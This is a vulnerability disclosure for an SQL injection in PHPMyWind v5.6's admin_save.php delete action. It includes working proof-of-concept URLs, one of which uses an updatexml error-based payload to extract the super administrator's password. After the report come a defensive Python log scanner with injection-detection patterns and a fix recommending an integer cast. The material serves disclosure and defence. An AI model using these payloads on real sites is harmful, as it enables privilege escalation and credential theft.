Description
Product Homepage: http://phpmywind.com/
Hello!
I found a serious SQL injection vulnerability in the backend management system (/admin/admin_save.php) of PHPMyWind v5.6.
This vulnerability allows low-privilege site administrators to gain access to super-administrator accounts and passwords.
Vulnerability validation:
First, there are three types of administrators in the current system: super administrators, site administrators, and article publishers.

Now log in to the backend management system as a site administrator, click "administrator management", and then the "delete" function is the location of the vulnerability.

Its URL is http://127.0.0.1/admin/admin_save.php?action=del&id=4

POC
(1)
http://127.0.0.1/admin/admin_save.php?action=del&id=4%27

(2) Show the current database
http://127.0.0.1/admin/admin_save.php?action=del&id=4%20%20and%20id%20in%20(char(@`%27`),updatexml(1,concat(0x7e,(select%20database())),1),char(@`%27`))

(3) Query the super administrator's password
http://127.0.0.1/admin/admin_save.php?action=del&id=4 and id in (char(@`'`),updatexml(1,concat(0x7e,(select password from pmw_admin limit 0,1)),1),char(@`'`))

This vulnerability allows you to query the database for any data you want.
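For defenders, the injection point above is easy to spot in access logs: the `id` parameter of `admin_save.php?action=del` should only ever be an integer. The following is an added example (not part of the report or of PHPMyWind) that scans constructed log lines for non-numeric `id` values and for the error-based primitives the PoC relies on; the log lines, IP and timestamps are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache-style access log lines (not from the report); the request
# strings mirror the benign URL and the PoC shapes shown above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /admin/admin_save.php?action=del&id=4 HTTP/1.1" 302 -
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /admin/admin_save.php?action=del&id=4%27 HTTP/1.1" 500 -
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /admin/admin_save.php?action=del&id=4%20%20and%20id%20in%20(char(@`%27`),updatexml(1,concat(0x7e,(select%20database())),1),char(@`%27`)) HTTP/1.1" 500 -
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /admin/index.php HTTP/1.1" 200 -
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Error-based injection primitives used in the PoC; matched after URL decoding.
ERROR_BASED = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.IGNORECASE)

def inspect_request(target):
    """Return a list of findings for one request target, empty if it looks benign."""
    parts = urlsplit(target)
    if not parts.path.endswith("/admin/admin_save.php"):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for raw in params.get("id", []):
        value = unquote(raw)  # parse_qs decodes once; unquote again for double encoding
        # The delete handler expects a numeric primary key; anything else is suspicious.
        if not value.isdigit():
            findings.append("non-numeric id: %r" % value)
        if ERROR_BASED.search(value):
            findings.append("error-based SQL injection function in id")
    return findings

def scan_log(text):
    """Return [(line_number, findings)] for every suspicious line in an access log."""
    hits = []
    for n, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = inspect_request(m.group("target"))
        if findings:
            hits.append((n, findings))
    return hits

if __name__ == "__main__":
    for n, findings in scan_log(SAMPLE_LOG):
        print(n, "; ".join(findings))
```

The same integer-only rule is the fix on the server side: cast `id` to an integer (or bind it as an integer parameter in a prepared statement) before it reaches the DELETE query.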
